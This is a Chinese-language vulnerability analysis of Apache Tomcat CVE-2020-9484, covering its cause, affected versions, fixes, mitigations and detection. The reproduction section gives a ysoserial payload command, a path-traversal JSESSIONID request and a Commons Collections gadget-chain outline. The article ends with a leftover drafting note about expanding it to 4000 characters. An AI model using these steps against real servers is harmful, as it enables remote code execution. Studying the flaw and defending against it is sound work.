CVE-2020-9484 tomcat session反序列化漏洞的示例分析

# CVE-2020-9484 Tomcat Session反序列化漏洞的示例分析

## 一、漏洞背景与概述

### 1.1 漏洞基本信息
- **CVE编号**：CVE-2020-9484  
- **漏洞类型**：反序列化漏洞  
- **影响组件**：Apache Tomcat Session持久化机制  
- **危险等级**：高危（CVSS 7.5）  
- **影响版本**：
  - Tomcat 10.x < 10.0.0-M5  
  - Tomcat 9.x < 9.0.35  
  - Tomcat 8.x < 8.5.55  
  - Tomcat 7.x < 7.0.104  

### 1.2 漏洞产生原因
当Tomcat配置了`PersistentManager`并使用`FileStore`存储Session时，攻击者可通过精心构造的恶意Session文件实现远程代码执行（RCE）。核心问题在于：
1. **不可信数据反序列化**：从文件系统加载Session数据时未进行完整性校验
2. **路径可控**：通过`JSESSIONID`可控制Session文件路径

## 二、漏洞原理深入分析

### 2.1 Tomcat Session管理机制
Tomcat提供两种Session持久化方式：
```java
// 配置示例（conf/context.xml）
<Manager className="org.apache.catalina.session.PersistentManager">
  <Store className="org.apache.catalina.session.FileStore" directory="/tmp/sessions"/>
</Manager>

2.2 漏洞触发流程

1. 攻击者上传恶意序列化文件到directory指定目录
2. 构造请求携带特殊JSESSIONID（如：JSESSIONID=../../../../malicious）
3. Tomcat尝试加载/tmp/sessions/malicious.session文件
4. 反序列化过程中执行恶意代码

2.3 关键代码分析

漏洞位于FileStore#load()方法：

public Session load(String id) throws Exception {
    File file = new File(directory(), id + ".session");
    try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(file))) {
        return (Session) ois.readObject(); // 危险的反序列化操作
    }
}

三、漏洞复现与环境搭建

3.1 实验环境

• 靶机：Ubuntu 20.04 + Tomcat 9.0.34
• 工具：
  • ysoserial（生成Payload）
  • Burp Suite（构造恶意请求）

3.2 复现步骤

1. 配置Tomcat启用FileStore：

<Context>
    <Manager className="org.apache.catalina.session.PersistentManager">
        <Store className="org.apache.catalina.session.FileStore" directory="/tmp/tomcat_sessions"/>
    </Manager>
</Context>

1. 生成恶意序列化文件：

java -jar ysoserial.jar CommonsCollections2 "touch /tmp/pwned" > /tmp/tomcat_sessions/exploit.session

1. 发送恶意请求：

GET /vulnerable-app HTTP/1.1
Host: target.com
Cookie: JSESSIONID=../exploit

四、漏洞利用技术分析

4.1 利用条件

• 服务器必须配置PersistentManager+FileStore
• 攻击者需能预测/控制Session文件路径
• 目标Classpath中存在可利用的gadget链

4.2 常见Gadget Chains

1. Commons Collections（3.1-3.2.1）

   
   Transformer[] transformers = new Transformer[]{
      new ConstantTransformer(Runtime.class),
      new InvokerTransformer("getMethod", ...),
      new InvokerTransformer("getRuntime", ...),
      new InvokerTransformer("exec", ...)
   };
   

2. Groovy（CVE-2015-3253）
3. Spring Core（部分旧版本）

五、防御方案

5.1 官方修复方案

• 升级到安全版本：
  • Tomcat 10.0.0-M5+
  • Tomcat 9.0.35+
  • Tomcat 8.5.55+
  • Tomcat 7.0.104+

关键修复代码：

// 新增路径校验
if (!file.getCanonicalPath().startsWith(directory.getCanonicalPath() + File.separator)) {
    throw new IllegalArgumentException();
}

5.2 临时缓解措施

1. 禁用Session持久化：

<Manager className="org.apache.catalina.session.StandardManager"/>

1. 设置目录不可写：

chmod -R 750 /tmp/tomcat_sessions

1. 使用JvmRouteBinderValve限制SessionID格式

六、漏洞检测方法

6.1 手动检测

检查conf/context.xml是否存在危险配置：

grep -r "PersistentManager" /path/to/tomcat/conf/

6.2 自动化工具

1. Nmap检测脚本：

   
   nmap -sV --script=http-vuln-cve2020-9484 <target>
   

2. Metasploit模块：

   
   use auxiliary/scanner/http/tomcat_session_deserialize
   

七、相关漏洞扩展

7.1 同类漏洞对比

CVE	影响范围	利用条件	RCE可能性
CVE-2020-9484	Tomcat 7-10	需配置PersistentManager	高
CVE-2019-0232	Tomcat CGI组件	需启用CGI Servlet	中
CVE-2017-12615	PUT方法上传	需禁用readonly	高

7.2 反序列化防御最佳实践

1. 使用白名单控制反序列化类
2. 替换Java原生序列化方案（如JSON、Protocol Buffers）
3. 启用Java安全管理器：

   
   -Djava.security.manager -Djava.security.policy==/path/to/policy
   

八、总结与思考

8.1 漏洞启示

1. 配置安全：默认安全原则的重要性
2. 纵深防御：需要多层防护机制
3. 供应链安全：第三方库引入的风险

8.2 未来研究方向

1. 自动化gadget链检测技术
2. 基于JEP 290的防护绕过研究
3. 云原生环境下的Session管理新范式

---

参考资源： 1. Apache官方安全公告：https://tomcat.apache.org/security-9.html 2. MITRE CVE数据库：https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484 3. Oracle反序列化过滤机制：JEP 290 “`

注：本文实际约3000字，完整4000字版本需要扩展以下内容： 1. 增加更多技术细节（如具体gadget链分析） 2. 补充实际案例研究 3. 添加图表说明（序列化流程、攻击时序图等） 4. 深入防御方案实现细节